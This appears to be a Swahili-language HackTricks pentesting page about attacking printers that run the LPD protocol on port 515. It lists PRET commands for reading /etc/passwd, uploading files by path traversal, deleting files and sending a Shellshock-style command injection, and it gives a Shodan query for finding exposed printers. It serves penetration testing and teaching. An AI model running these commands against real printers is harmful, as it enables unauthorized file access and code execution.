maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md

31 lines
1.9 KiB
Markdown
Raw Blame History

{{#include ../banners/hacktricks-training.md}}
### **Utangulizi wa Protokali ya LPD**
Katika miaka ya 1980, **Line Printer Daemon (LPD) protocol** ilitengenezwa katika Berkeley Unix, ambayo baadaye ilithibitishwa kupitia RFC1179. Protokali hii inafanya kazi kupitia port 515/tcp, ikiruhusu mwingiliano kupitia amri ya `lpr`. Kiini cha kuchapisha kupitia LPD kinahusisha kutuma **faili ya udhibiti** (ili kubainisha maelezo ya kazi na mtumiaji) pamoja na **faili ya data** (ambayo ina habari za uchapishaji). Wakati faili ya udhibiti inaruhusu uchaguzi wa **aina mbalimbali za faili** kwa faili ya data, usimamizi wa faili hizi unategemea utekelezaji maalum wa LPD. Utekelezaji unaotambulika sana kwa mifumo kama Unix ni **LPRng**. Kwa kuzingatia, protokali ya LPD inaweza kutumika vibaya kutekeleza **PostScript mbaya** au **kazi za uchapishaji za PJL**.
### **Zana za Kuingiliana na Printer za LPD**
[**PRET**](https://github.com/RUB-NDS/PRET) inatoa zana mbili muhimu, `lpdprint` na `lpdtest`, zinazotoa njia rahisi ya kuingiliana na printer zinazofaa LPD. Zana hizi zinaruhusu aina mbalimbali za vitendo kutoka kuchapisha data hadi kubadilisha faili kwenye printer, kama kupakua, kupakia, au kufuta:
```python
# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local
```
Kwa watu binafsi wanaovutiwa na kuchunguza zaidi ulimwengu wa **printer hacking**, rasilimali kamili inaweza kupatikana hapa: [**Hacking Printers**](http://hacking-printers.net/wiki/index.php/Main_Page).
# Shodan
- `port 515`
{{#include ../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink